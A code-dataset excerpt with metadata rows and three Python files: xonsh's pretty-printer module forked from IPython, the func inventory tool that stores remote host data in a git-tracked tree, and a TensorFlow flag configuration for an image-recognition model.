repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
szlin/gitsome | xonsh/pretty.py | 1 | 27713 | # -*- coding: utf-8 -*-
"""
Python advanced pretty printer. This pretty printer is intended to
replace the old `pprint` python module which does not allow developers
to provide their own pretty print callbacks.
This module is based on ruby's `prettyprint.rb` library by `Tanaka Akira`.
The following implementations were forked from the IPython project:
* Copyright (c) 2008-2014, IPython Development Team
* Copyright (C) 2001-2007 Fernando Perez <[email protected]>
* Copyright (c) 2001, Janko Hauser <[email protected]>
* Copyright (c) 2001, Nathaniel Gray <[email protected]>
Example Usage
-------------
To directly print the representation of an object use `pprint`::
from pretty import pprint
pprint(complex_object)
To get a string of the output use `pretty`::
from pretty import pretty
string = pretty(complex_object)
Extending
---------
The pretty library allows developers to add pretty printing rules for their
own objects. This process is straightforward. All you have to do is to
add a `_repr_pretty_` method to your object and call the methods on the
pretty printer passed::
class MyObject(object):
def _repr_pretty_(self, p, cycle):
...
Here is an example implementation of a `_repr_pretty_` method for a list
subclass::
class MyList(list):
def _repr_pretty_(self, p, cycle):
if cycle:
p.text('MyList(...)')
else:
with p.group(8, 'MyList([', '])'):
for idx, item in enumerate(self):
if idx:
p.text(',')
p.breakable()
p.pretty(item)
The `cycle` parameter is `True` if pretty detected a cycle. You *have* to
react to that or the result is an infinite loop. `p.text()` just adds
non breaking text to the output, `p.breakable()` either adds a whitespace
or breaks here. If you pass it an argument it's used instead of the
default space. `p.pretty` prettyprints another object using the pretty print
method.
The first parameter to the `group` function specifies the extra indentation
of the next line. In this example the next item will either be on the same
line (if the items are short enough) or aligned with the right edge of the
opening bracket of `MyList`.
If you just want to indent something you can use the group function
without open / close parameters. Yu can also use this code::
with p.indent(2):
...
Inheritance diagram:
.. inheritance-diagram:: IPython.lib.pretty
:parts: 3
:copyright: 2007 by Armin Ronacher.
Portions (c) 2009 by Robert Kern.
:license: BSD License.
"""
from contextlib import contextmanager
import sys
import types
import re
import datetime
from collections import deque
# from IPython.utils.py3compat import PY3, cast_unicode
# from IPython.utils.encoding import get_stream_enc
from io import StringIO
__all__ = ['pretty', 'pprint', 'PrettyPrinter', 'RepresentationPrinter',
'for_type', 'for_type_by_name']
MAX_SEQ_LENGTH = 1000
_re_pattern_type = type(re.compile(''))
def _safe_getattr(obj, attr, default=None):
"""Safe version of getattr.
Same as getattr, but will return ``default`` on any Exception,
rather than raising.
"""
try:
return getattr(obj, attr, default)
except Exception:
return default
# if PY3:
CUnicodeIO = StringIO
# else:
# class CUnicodeIO(StringIO):
# """StringIO that casts str to unicode on Python 2"""
# def write(self, text):
# return super(CUnicodeIO, self).write(
# cast_unicode(text, encoding=get_stream_enc(sys.stdout)))
def pretty(obj, verbose=False, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
"""
Pretty print the object's representation.
"""
stream = CUnicodeIO()
printer = RepresentationPrinter(stream, verbose, max_width, newline, max_seq_length)
printer.pretty(obj)
printer.flush()
return stream.getvalue()
def pprint(obj, verbose=False, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
"""
Like `pretty` but print to stdout.
"""
printer = RepresentationPrinter(sys.stdout, verbose, max_width, newline, max_seq_length)
printer.pretty(obj)
printer.flush()
sys.stdout.write(newline)
sys.stdout.flush()
class _PrettyPrinterBase(object):
@contextmanager
def indent(self, indent):
"""with statement support for indenting/dedenting."""
self.indentation += indent
try:
yield
finally:
self.indentation -= indent
@contextmanager
def group(self, indent=0, gopen='', gclose=''):
"""like begin_group / end_group but for the with statement."""
self.begin_group(indent, gopen)
try:
yield
finally:
self.end_group(indent, gclose)
class PrettyPrinter(_PrettyPrinterBase):
"""
Baseclass for the `RepresentationPrinter` prettyprinter that is used to
generate pretty reprs of objects. Contrary to the `RepresentationPrinter`
this printer knows nothing about the default pprinters or the `_repr_pretty_`
callback method.
"""
def __init__(self, output, max_width=79, newline='\n', max_seq_length=MAX_SEQ_LENGTH):
self.output = output
self.max_width = max_width
self.newline = newline
self.max_seq_length = max_seq_length
self.output_width = 0
self.buffer_width = 0
self.buffer = deque()
root_group = Group(0)
self.group_stack = [root_group]
self.group_queue = GroupQueue(root_group)
self.indentation = 0
def _break_outer_groups(self):
while self.max_width < self.output_width + self.buffer_width:
group = self.group_queue.deq()
if not group:
return
while group.breakables:
x = self.buffer.popleft()
self.output_width = x.output(self.output, self.output_width)
self.buffer_width -= x.width
while self.buffer and isinstance(self.buffer[0], Text):
x = self.buffer.popleft()
self.output_width = x.output(self.output, self.output_width)
self.buffer_width -= x.width
def text(self, obj):
"""Add literal text to the output."""
width = len(obj)
if self.buffer:
text = self.buffer[-1]
if not isinstance(text, Text):
text = Text()
self.buffer.append(text)
text.add(obj, width)
self.buffer_width += width
self._break_outer_groups()
else:
self.output.write(obj)
self.output_width += width
def breakable(self, sep=' '):
"""
Add a breakable separator to the output. This does not mean that it
will automatically break here. If no breaking on this position takes
place the `sep` is inserted which default to one space.
"""
width = len(sep)
group = self.group_stack[-1]
if group.want_break:
self.flush()
self.output.write(self.newline)
self.output.write(' ' * self.indentation)
self.output_width = self.indentation
self.buffer_width = 0
else:
self.buffer.append(Breakable(sep, width, self))
self.buffer_width += width
self._break_outer_groups()
def break_(self):
"""
Explicitly insert a newline into the output, maintaining correct indentation.
"""
self.flush()
self.output.write(self.newline)
self.output.write(' ' * self.indentation)
self.output_width = self.indentation
self.buffer_width = 0
def begin_group(self, indent=0, gopen=''):
"""
Begin a group. If you want support for python < 2.5 which doesn't has
the with statement this is the preferred way:
p.begin_group(1, '{')
...
p.end_group(1, '}')
The python 2.5 expression would be this:
with p.group(1, '{', '}'):
...
The first parameter specifies the indentation for the next line (usually
the width of the opening text), the second the opening text. All
parameters are optional.
"""
if gopen:
self.text(gopen)
group = Group(self.group_stack[-1].depth + 1)
self.group_stack.append(group)
self.group_queue.enq(group)
self.indentation += indent
def _enumerate(self, seq):
"""like enumerate, but with an upper limit on the number of items"""
for idx, x in enumerate(seq):
if self.max_seq_length and idx >= self.max_seq_length:
self.text(',')
self.breakable()
self.text('...')
raise StopIteration
yield idx, x
def end_group(self, dedent=0, gclose=''):
"""End a group. See `begin_group` for more details."""
self.indentation -= dedent
group = self.group_stack.pop()
if not group.breakables:
self.group_queue.remove(group)
if gclose:
self.text(gclose)
def flush(self):
"""Flush data that is left in the buffer."""
for data in self.buffer:
self.output_width += data.output(self.output, self.output_width)
self.buffer.clear()
self.buffer_width = 0
def _get_mro(obj_class):
""" Get a reasonable method resolution order of a class and its superclasses
for both old-style and new-style classes.
"""
if not hasattr(obj_class, '__mro__'):
# Old-style class. Mix in object to make a fake new-style class.
try:
obj_class = type(obj_class.__name__, (obj_class, object), {})
except TypeError:
# Old-style extension type that does not descend from object.
# FIXME: try to construct a more thorough MRO.
mro = [obj_class]
else:
mro = obj_class.__mro__[1:-1]
else:
mro = obj_class.__mro__
return mro
class RepresentationPrinter(PrettyPrinter):
"""
Special pretty printer that has a `pretty` method that calls the pretty
printer for a python object.
This class stores processing data on `self` so you must *never* use
this class in a threaded environment. Always lock it or reinstanciate
it.
Instances also have a verbose flag callbacks can access to control their
output. For example the default instance repr prints all attributes and
methods that are not prefixed by an underscore if the printer is in
verbose mode.
"""
def __init__(self, output, verbose=False, max_width=79, newline='\n',
singleton_pprinters=None, type_pprinters=None, deferred_pprinters=None,
max_seq_length=MAX_SEQ_LENGTH):
PrettyPrinter.__init__(self, output, max_width, newline, max_seq_length=max_seq_length)
self.verbose = verbose
self.stack = []
if singleton_pprinters is None:
singleton_pprinters = _singleton_pprinters.copy()
self.singleton_pprinters = singleton_pprinters
if type_pprinters is None:
type_pprinters = _type_pprinters.copy()
self.type_pprinters = type_pprinters
if deferred_pprinters is None:
deferred_pprinters = _deferred_type_pprinters.copy()
self.deferred_pprinters = deferred_pprinters
def pretty(self, obj):
"""Pretty print the given object."""
obj_id = id(obj)
cycle = obj_id in self.stack
self.stack.append(obj_id)
self.begin_group()
try:
obj_class = _safe_getattr(obj, '__class__', None) or type(obj)
# First try to find registered singleton printers for the type.
try:
printer = self.singleton_pprinters[obj_id]
except (TypeError, KeyError):
pass
else:
return printer(obj, self, cycle)
# Next walk the mro and check for either:
# 1) a registered printer
# 2) a _repr_pretty_ method
for cls in _get_mro(obj_class):
if cls in self.type_pprinters:
# printer registered in self.type_pprinters
return self.type_pprinters[cls](obj, self, cycle)
else:
# deferred printer
printer = self._in_deferred_types(cls)
if printer is not None:
return printer(obj, self, cycle)
else:
# Finally look for special method names.
# Some objects automatically create any requested
# attribute. Try to ignore most of them by checking for
# callability.
if '_repr_pretty_' in cls.__dict__:
meth = cls._repr_pretty_
if callable(meth):
return meth(obj, self, cycle)
return _default_pprint(obj, self, cycle)
finally:
self.end_group()
self.stack.pop()
def _in_deferred_types(self, cls):
"""
Check if the given class is specified in the deferred type registry.
Returns the printer from the registry if it exists, and None if the
class is not in the registry. Successful matches will be moved to the
regular type registry for future use.
"""
mod = _safe_getattr(cls, '__module__', None)
name = _safe_getattr(cls, '__name__', None)
key = (mod, name)
printer = None
if key in self.deferred_pprinters:
# Move the printer over to the regular registry.
printer = self.deferred_pprinters.pop(key)
self.type_pprinters[cls] = printer
return printer
class Printable(object):
def output(self, stream, output_width):
return output_width
class Text(Printable):
def __init__(self):
self.objs = []
self.width = 0
def output(self, stream, output_width):
for obj in self.objs:
stream.write(obj)
return output_width + self.width
def add(self, obj, width):
self.objs.append(obj)
self.width += width
class Breakable(Printable):
def __init__(self, seq, width, pretty):
self.obj = seq
self.width = width
self.pretty = pretty
self.indentation = pretty.indentation
self.group = pretty.group_stack[-1]
self.group.breakables.append(self)
def output(self, stream, output_width):
self.group.breakables.popleft()
if self.group.want_break:
stream.write(self.pretty.newline)
stream.write(' ' * self.indentation)
return self.indentation
if not self.group.breakables:
self.pretty.group_queue.remove(self.group)
stream.write(self.obj)
return output_width + self.width
class Group(Printable):
def __init__(self, depth):
self.depth = depth
self.breakables = deque()
self.want_break = False
class GroupQueue(object):
def __init__(self, *groups):
self.queue = []
for group in groups:
self.enq(group)
def enq(self, group):
depth = group.depth
while depth > len(self.queue) - 1:
self.queue.append([])
self.queue[depth].append(group)
def deq(self):
for stack in self.queue:
for idx, group in enumerate(reversed(stack)):
if group.breakables:
del stack[idx]
group.want_break = True
return group
for group in stack:
group.want_break = True
del stack[:]
def remove(self, group):
try:
self.queue[group.depth].remove(group)
except ValueError:
pass
try:
_baseclass_reprs = (object.__repr__, types.InstanceType.__repr__)
except AttributeError: # Python 3
_baseclass_reprs = (object.__repr__,)
def _default_pprint(obj, p, cycle):
"""
The default print function. Used if an object does not provide one and
it's none of the builtin objects.
"""
klass = _safe_getattr(obj, '__class__', None) or type(obj)
if _safe_getattr(klass, '__repr__', None) not in _baseclass_reprs:
# A user-provided repr. Find newlines and replace them with p.break_()
_repr_pprint(obj, p, cycle)
return
p.begin_group(1, '<')
p.pretty(klass)
p.text(' at 0x%x' % id(obj))
if cycle:
p.text(' ...')
elif p.verbose:
first = True
for key in dir(obj):
if not key.startswith('_'):
try:
value = getattr(obj, key)
except AttributeError:
continue
if isinstance(value, types.MethodType):
continue
if not first:
p.text(',')
p.breakable()
p.text(key)
p.text('=')
step = len(key) + 1
p.indentation += step
p.pretty(value)
p.indentation -= step
first = False
p.end_group(1, '>')
def _seq_pprinter_factory(start, end, basetype):
"""
Factory that returns a pprint function useful for sequences. Used by
the default pprint for tuples, dicts, and lists.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text(start + '...' + end)
step = len(start)
p.begin_group(step, start)
for idx, x in p._enumerate(obj):
if idx:
p.text(',')
p.breakable()
p.pretty(x)
if len(obj) == 1 and type(obj) is tuple:
# Special case for 1-item tuples.
p.text(',')
p.end_group(step, end)
return inner
def _set_pprinter_factory(start, end, basetype):
"""
Factory that returns a pprint function useful for sets and frozensets.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text(start + '...' + end)
if len(obj) == 0:
# Special case.
p.text(basetype.__name__ + '()')
else:
step = len(start)
p.begin_group(step, start)
# Like dictionary keys, we will try to sort the items if there aren't too many
items = obj
if not (p.max_seq_length and len(obj) >= p.max_seq_length):
try:
items = sorted(obj)
except Exception:
# Sometimes the items don't sort.
pass
for idx, x in p._enumerate(items):
if idx:
p.text(',')
p.breakable()
p.pretty(x)
p.end_group(step, end)
return inner
def _dict_pprinter_factory(start, end, basetype=None):
"""
Factory that returns a pprint function used by the default pprint of
dicts and dict proxies.
"""
def inner(obj, p, cycle):
typ = type(obj)
if basetype is not None and typ is not basetype and typ.__repr__ != basetype.__repr__:
# If the subclass provides its own repr, use it instead.
return p.text(typ.__repr__(obj))
if cycle:
return p.text('{...}')
p.begin_group(1, start)
keys = obj.keys()
# if dict isn't large enough to be truncated, sort keys before displaying
if not (p.max_seq_length and len(obj) >= p.max_seq_length):
try:
keys = sorted(keys)
except Exception:
# Sometimes the keys don't sort.
pass
for idx, key in p._enumerate(keys):
if idx:
p.text(',')
p.breakable()
p.pretty(key)
p.text(': ')
p.pretty(obj[key])
p.end_group(1, end)
return inner
def _super_pprint(obj, p, cycle):
"""The pprint for the super type."""
p.begin_group(8, '<super: ')
p.pretty(obj.__thisclass__)
p.text(',')
p.breakable()
p.pretty(obj.__self__)
p.end_group(8, '>')
def _re_pattern_pprint(obj, p, cycle):
"""The pprint function for regular expression patterns."""
p.text('re.compile(')
pattern = repr(obj.pattern)
if pattern[:1] in 'uU':
pattern = pattern[1:]
prefix = 'ur'
else:
prefix = 'r'
pattern = prefix + pattern.replace('\\\\', '\\')
p.text(pattern)
if obj.flags:
p.text(',')
p.breakable()
done_one = False
for flag in ('TEMPLATE', 'IGNORECASE', 'LOCALE', 'MULTILINE', 'DOTALL',
'UNICODE', 'VERBOSE', 'DEBUG'):
if obj.flags & getattr(re, flag):
if done_one:
p.text('|')
p.text('re.' + flag)
done_one = True
p.text(')')
def _type_pprint(obj, p, cycle):
"""The pprint for classes and types."""
# Heap allocated types might not have the module attribute,
# and others may set it to None.
# Checks for a __repr__ override in the metaclass
if type(obj).__repr__ is not type.__repr__:
_repr_pprint(obj, p, cycle)
return
mod = _safe_getattr(obj, '__module__', None)
name = _safe_getattr(obj, '__qualname__', obj.__name__)
if mod in (None, '__builtin__', 'builtins', 'exceptions'):
p.text(name)
else:
p.text(mod + '.' + name)
def _repr_pprint(obj, p, cycle):
"""A pprint that just redirects to the normal repr function."""
# Find newlines and replace them with p.break_()
output = repr(obj)
for idx, output_line in enumerate(output.splitlines()):
if idx:
p.break_()
p.text(output_line)
def _function_pprint(obj, p, cycle):
"""Base pprint for all functions and builtin functions."""
name = _safe_getattr(obj, '__qualname__', obj.__name__)
mod = obj.__module__
if mod and mod not in ('__builtin__', 'builtins', 'exceptions'):
name = mod + '.' + name
p.text('<function %s>' % name)
def _exception_pprint(obj, p, cycle):
"""Base pprint for all exceptions."""
name = getattr(obj.__class__, '__qualname__', obj.__class__.__name__)
if obj.__class__.__module__ not in ('exceptions', 'builtins'):
name = '%s.%s' % (obj.__class__.__module__, name)
step = len(name) + 1
p.begin_group(step, name + '(')
for idx, arg in enumerate(getattr(obj, 'args', ())):
if idx:
p.text(',')
p.breakable()
p.pretty(arg)
p.end_group(step, ')')
#: the exception base
try:
_exception_base = BaseException
except NameError:
_exception_base = Exception
#: printers for builtin types
_type_pprinters = {
int: _repr_pprint,
float: _repr_pprint,
str: _repr_pprint,
tuple: _seq_pprinter_factory('(', ')', tuple),
list: _seq_pprinter_factory('[', ']', list),
dict: _dict_pprinter_factory('{', '}', dict),
set: _set_pprinter_factory('{', '}', set),
frozenset: _set_pprinter_factory('frozenset({', '})', frozenset),
super: _super_pprint,
_re_pattern_type: _re_pattern_pprint,
type: _type_pprint,
types.FunctionType: _function_pprint,
types.BuiltinFunctionType: _function_pprint,
types.MethodType: _repr_pprint,
datetime.datetime: _repr_pprint,
datetime.timedelta: _repr_pprint,
_exception_base: _exception_pprint
}
try:
_type_pprinters[types.DictProxyType] = _dict_pprinter_factory('<dictproxy {', '}>')
_type_pprinters[types.ClassType] = _type_pprint
_type_pprinters[types.SliceType] = _repr_pprint
except AttributeError: # Python 3
_type_pprinters[slice] = _repr_pprint
try:
_type_pprinters[xrange] = _repr_pprint
_type_pprinters[long] = _repr_pprint
_type_pprinters[unicode] = _repr_pprint
except NameError:
_type_pprinters[range] = _repr_pprint
_type_pprinters[bytes] = _repr_pprint
#: printers for types specified by name
_deferred_type_pprinters = {
}
def for_type(typ, func):
"""
Add a pretty printer for a given type.
"""
oldfunc = _type_pprinters.get(typ, None)
if func is not None:
# To support easy restoration of old pprinters, we need to ignore Nones.
_type_pprinters[typ] = func
return oldfunc
def for_type_by_name(type_module, type_name, func):
"""
Add a pretty printer for a type specified by the module and name of a type
rather than the type object itself.
"""
key = (type_module, type_name)
oldfunc = _deferred_type_pprinters.get(key, None)
if func is not None:
# To support easy restoration of old pprinters, we need to ignore Nones.
_deferred_type_pprinters[key] = func
return oldfunc
#: printers for the default singletons
_singleton_pprinters = dict.fromkeys(map(id, [None, True, False, Ellipsis,
NotImplemented]), _repr_pprint)
def _defaultdict_pprint(obj, p, cycle):
name = 'defaultdict'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
else:
p.pretty(obj.default_factory)
p.text(',')
p.breakable()
p.pretty(dict(obj))
def _ordereddict_pprint(obj, p, cycle):
name = 'OrderedDict'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
elif len(obj):
p.pretty(list(obj.items()))
def _deque_pprint(obj, p, cycle):
name = 'deque'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
else:
p.pretty(list(obj))
def _counter_pprint(obj, p, cycle):
name = 'Counter'
with p.group(len(name) + 1, name + '(', ')'):
if cycle:
p.text('...')
elif len(obj):
p.pretty(dict(obj))
for_type_by_name('collections', 'defaultdict', _defaultdict_pprint)
for_type_by_name('collections', 'OrderedDict', _ordereddict_pprint)
for_type_by_name('collections', 'deque', _deque_pprint)
for_type_by_name('collections', 'Counter', _counter_pprint)
if __name__ == '__main__':
from random import randrange
class Foo(object):
def __init__(self):
self.foo = 1
self.bar = re.compile(r'\s+')
self.blub = dict.fromkeys(range(30), randrange(1, 40))
self.hehe = 23424.234234
self.list = ["blub", "blah", self]
def get_foo(self):
print("foo")
pprint(Foo(), verbose=True)
| gpl-3.0 | 1,760,497,032,878,910,500 | 31.337223 | 95 | 0.567062 | false |
pombredanne/func | func/overlord/inventory.py | 1 | 6796 | ##
## func inventory app.
## use func to collect inventory data on anything, yes, anything
##
## Copyright 2007, Red Hat, Inc
## Michael DeHaan <[email protected]>
## +AUTHORS
##
## This software may be freely redistributed under the terms of the GNU
## general public license.
##
## You should have received a copy of the GNU General Public License
## along with this program; if not, write to the Free Software
## Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
##
import os.path
import time
import optparse
import sys
import pprint
import xmlrpclib
from func.minion import sub_process
import func.overlord.client as func_client
import func.utils as utils
DEFAULT_TREE = "/var/lib/func/inventory/"
class FuncInventory(object):
def __init__(self):
pass
def run(self,args):
p = optparse.OptionParser()
p.add_option("-v", "--verbose",
dest="verbose",
action="store_true",
help="provide extra output")
p.add_option("-s", "--server-spec",
dest="server_spec",
default="*",
help="run against specific servers, default: '*'")
p.add_option("-m", "--methods",
dest="methods",
default="inventory",
help="run inventory only on certain function names, default: 'inventory'")
p.add_option("-M", "--modules",
dest="modules",
default="all",
help="run inventory only on certain module names, default: 'all'")
p.add_option("-t", "--tree",
dest="tree",
default=DEFAULT_TREE,
help="output results tree here, default: %s" % DEFAULT_TREE)
p.add_option("-n", "--no-git",
dest="nogit",
action="store_true",
help="disable useful change tracking features")
p.add_option("-x", "--xmlrpc", dest="xmlrpc",
help="output data using XMLRPC format",
action="store_true")
p.add_option("-j", "--json", dest="json",
help="output data using JSON",
action="store_true")
(options, args) = p.parse_args(args)
self.options = options
filtered_module_list = options.modules.split(",")
filtered_function_list = options.methods.split(",")
self.git_setup(options)
# see what modules each host provides (as well as what hosts we have)
host_methods = func_client.Overlord(options.server_spec).system.list_methods()
# call all remote info methods and handle them
if options.verbose:
print "- scanning ..."
# for (host, modules) in host_modules.iteritems():
for (host, methods) in host_methods.iteritems():
if utils.is_error(methods):
print "-- connection refused: %s" % host
break
for each_method in methods:
#if type(each_method) == int:
# if self.options.verbose:
# print "-- connection refused: %s" % host
# break
tokens = each_method.split(".")
module_name = ".".join(tokens[:-1])
method_name = tokens[-1]
if not "all" in filtered_module_list and not module_name in filtered_module_list:
continue
if not "all" in filtered_function_list and not method_name in filtered_function_list:
continue
overlord = func_client.Overlord(host,noglobs=True) # ,noglobs=True)
results = getattr(getattr(overlord,module_name),method_name)()
if self.options.verbose:
print "-- %s: running: %s %s" % (host, module_name, method_name)
self.save_results(options, host, module_name, method_name, results)
self.git_update(options)
return 1
def format_return(self, data):
"""
The call module supports multiple output return types, the default is pprint.
"""
# special case... if the return is a string, just print it straight
if type(data) == str:
return data
if self.options.xmlrpc:
return xmlrpclib.dumps((data,""))
if self.options.json:
try:
import simplejson
return simplejson.dumps(data)
except ImportError:
print "ERROR: json support not found, install python-simplejson"
sys.exit(1)
return pprint.pformat(data)
# FUTURE: skvidal points out that guest symlinking would be an interesting feature
def save_results(self, options, host_name, module_name, method_name, results):
dirname = os.path.join(options.tree, host_name, module_name)
if not os.path.exists(dirname):
os.makedirs(dirname)
filename = os.path.join(dirname, method_name)
results_file = open(filename,"w+")
data = self.format_return(results)
results_file.write(data)
results_file.close()
def git_setup(self,options):
if options.nogit:
return
if not os.path.exists("/usr/bin/git"):
print "git-core is not installed, so no change tracking is available."
print "use --no-git or, better, just install it."
sys.exit(411)
if not os.path.exists(options.tree):
os.makedirs(options.tree)
dirname = os.path.join(options.tree, ".git")
if not os.path.exists(dirname):
if options.verbose:
print "- initializing git repo: %s" % options.tree
cwd = os.getcwd()
os.chdir(options.tree)
rc1 = sub_process.call(["/usr/bin/git", "init"], shell=False)
# FIXME: check rc's
os.chdir(cwd)
else:
if options.verbose:
print "- git already initialized: %s" % options.tree
def git_update(self,options):
if options.nogit:
return
else:
if options.verbose:
print "- updating git"
mytime = time.asctime()
cwd = os.getcwd()
os.chdir(options.tree)
rc1 = sub_process.call(["/usr/bin/git", "add", "*" ], shell=False)
rc2 = sub_process.call(["/usr/bin/git", "commit", "-a", "-m", "Func-inventory update: %s" % mytime], shell=False)
# FIXME: check rc's
os.chdir(cwd)
if __name__ == "__main__":
inv = FuncInventory()
inv.run(sys.argv)
| gpl-2.0 | 2,945,001,256,754,425,000 | 34.581152 | 121 | 0.543996 | false |
NicolasPresta/ReconoBook | config.py | 1 | 8342 | # coding=utf-8
# ==============================================================================
import tensorflow as tf
# ==============================================================================
FLAGS = tf.app.flags.FLAGS
# ==============================================================================
# -------------------------------- DIRECTORIOS --------------------------------
tf.app.flags.DEFINE_string('summary_dir_eval', './summary_eval', "Logs de proceso de evaluación")
tf.app.flags.DEFINE_string('summary_dir_train', './summary_train', "Logs de proceso de entrenamiento")
tf.app.flags.DEFINE_string('checkpoint_dir', './checkpoints', "Resguardo del modelo a utilizar")
tf.app.flags.DEFINE_string('datasets_dir', './datasets', 'Directorio donde esttán las imagenes a utilizar')
tf.app.flags.DEFINE_string('img_dir', './imagenes_jpg', 'Directorio donde esttán las imagenes a utilizar')
tf.app.flags.DEFINE_string('manual_test_folder', './manual_test_img/', 'Directorio con imagenes a evaluar manualmente')
tf.app.flags.DEFINE_string('data_split_dir', './split_jpg', 'Directorio donde estan las imagenes divididas a utilizar')
tf.app.flags.DEFINE_string('train_folder', 'train', 'Nombre directorio con las imagenes de entrenamiento')
tf.app.flags.DEFINE_string('validation_folder', 'validation', 'Nombre Directorio con las imagenes de validation')
tf.app.flags.DEFINE_string('test_folder', 'test', 'Nombre Directorio con las imagenes de test')
tf.app.flags.DEFINE_string('labels_file_name', 'labels.txt', 'Labels file')
tf.app.flags.DEFINE_string('export_model_dir', './export_model/', 'Carpeta donde se exporta el modelo')
# -------------------------------- DATASET --------------------------------
tf.app.flags.DEFINE_string('porcentaje_img_validation', 20, 'Porcentaje de imagenes que van al set de validation')
tf.app.flags.DEFINE_integer('cantidad_clases', 20, 'Cantidad de clases a reconocer')
tf.app.flags.DEFINE_boolean('modo_procesar', False, 'Al ejecutar analize_jpg realizar emparejamiento')
tf.app.flags.DEFINE_integer('img_por_captura', 110, 'Cantidad de imagenes a conservar por captura')
tf.app.flags.DEFINE_string('capturas_id', 'A,B,C,D,E,F', 'Ids de todas las capturas realizadas')
tf.app.flags.DEFINE_string('capturasEntrenamiento_id', 'A,C,D,E,F', 'Ids de todas las capturas para entrenar')
tf.app.flags.DEFINE_string('capturasTest_id', 'B', 'Ids de todas las capturas para test')
tf.app.flags.DEFINE_integer('train_shards', 1, 'Numero de particiones del dataset de entrenamiento')
tf.app.flags.DEFINE_integer('validation_shards', 1, 'Numero de particiones del dataset de validación')
tf.app.flags.DEFINE_integer('test_shards', 1, 'Numero de particiones del dataset de entrenamiento')
tf.app.flags.DEFINE_integer('dataset_num_threads', 1, 'Numero de hilos de ejecución para armar el dataset')
# -------------------------------- INPUT --------------------------------
tf.app.flags.DEFINE_integer('input_num_preprocess_threads', 2, 'Numero de hilos que hacen el preprocesado')
tf.app.flags.DEFINE_integer('input_num_readers', 2, 'Numero de readers')
tf.app.flags.DEFINE_integer('image_height', 40, 'Alto imagen')
tf.app.flags.DEFINE_integer('image_width', 40, 'Ancho imagen')
# -------------------------------- MODELO --------------------------------
tf.app.flags.DEFINE_integer('model_cant_kernels1', 30, 'Cantidad de kernels de convolución en la capa 1')
tf.app.flags.DEFINE_integer('model_cant_kernels2', 60, 'Cantidad de kernels de convolución en la capa 2')
tf.app.flags.DEFINE_integer('model_cant_fc1', 125, 'Cantidad de neurolas full conected en capa 3')
tf.app.flags.DEFINE_integer('model_version', 1, 'Versión del modelo')
# -------------------------------- ENTRENAMIENTO --------------------------------
tf.app.flags.DEFINE_integer("moving_average_decay", 0.9999, "The decay to use for the moving average.")
tf.app.flags.DEFINE_integer("initial_learning_rate", 0.09, "Initial learning rate.")
tf.app.flags.DEFINE_integer("decay_steps", 1000, "Epochs after which learning rate decays.")
tf.app.flags.DEFINE_integer("decay_rate", 0.95, "Learning rate decay factor.")
tf.app.flags.DEFINE_boolean('log_device_placement', False, "Si logea la ubicación de variables al inciar la ejecución")
tf.app.flags.DEFINE_boolean('allow_soft_placement', True, "Si permite una asignación de variables flexible")
tf.app.flags.DEFINE_boolean('train_distort', True, "Distorcionar imagenes al evaluar")
tf.app.flags.DEFINE_boolean('train_crop', True, "Distorcionar imagenes al evaluar")
tf.app.flags.DEFINE_integer('train_max_steps', 1000000, "Number of batches to run.")
tf.app.flags.DEFINE_integer("train_batch_size", 256, "Cantidad de imagenes que se procesan por batch")
tf.app.flags.DEFINE_integer("steps_to_imprimir_avance", 50, "Cantidad de pasos cada los cuales se imprimer por consola")
tf.app.flags.DEFINE_integer("steps_to_guardar_summary", 50, "Cantidad de pasos cada los cuales se guarda summary")
tf.app.flags.DEFINE_integer("steps_to_guardar_checkpoint", 500, "Cantidad de pasos cada los cuales se guarda checkpoint")
tf.app.flags.DEFINE_integer("saver_max_to_keep", 50, "Cantidad de checkouts a concervar")
tf.app.flags.DEFINE_boolean('use_dropout_1', False, "Si usa drop out en capa 1")
tf.app.flags.DEFINE_boolean('use_dropout_2', False, "Si usa drop out en capa 2")
tf.app.flags.DEFINE_boolean('use_dropout_3', False, "Si usa drop out en capa 3")
tf.app.flags.DEFINE_boolean('use_dropout_4', False, "Si usa drop out en capa 4")
tf.app.flags.DEFINE_integer("keep_drop_prob", 0.5, "probabilidad de quedar en el drop out")
tf.app.flags.DEFINE_integer("initializer_stddev", 0.004, "desviación estandar con la que se inician los variables")
tf.app.flags.DEFINE_integer("variable_wd", 0.0004, "weigth decay de las variables, regularización")
tf.app.flags.DEFINE_string('optimezer', 'GradientDescentOptimizer', 'Optimizador a usar: '
'GradientDescentOptimizer, '
'AdamOptimizer, '
'AdadeltaOptimizer, '
'RMSPropOptimizer, '
'ProximalGradientDescentOptimizer')
# -------------------------------- EVALUACION --------------------------------
tf.app.flags.DEFINE_boolean('eval_unique', False, "Ejecutar revisión imagen por imagen")
tf.app.flags.DEFINE_boolean('eval_unique_from_dataset', True, "Evaluar imagen por imagen desde dataset")
tf.app.flags.DEFINE_integer('eval_unique_cantidad_img', 3, "Cantidad de imagenes a evaluar si eval_unique = true")
tf.app.flags.DEFINE_string('eval_dataset', 'validation', 'Data set usado para validacion (train, validation o test')
tf.app.flags.DEFINE_boolean('eval_distort', False, "Distorcionar imagenes al evaluar")
tf.app.flags.DEFINE_boolean('eval_crop', False, "Distorcionar imagenes al evaluar")
tf.app.flags.DEFINE_integer('eval_num_examples', 2200, "Número de imagenes a evaluar")
tf.app.flags.DEFINE_integer('eval_num_examples_mini', 1000, "Número de imagenes a evaluar durante el entrenamiento")
tf.app.flags.DEFINE_integer("top_k_prediction", 1, "La predicción correcta si esta entre los k primeros resultados")
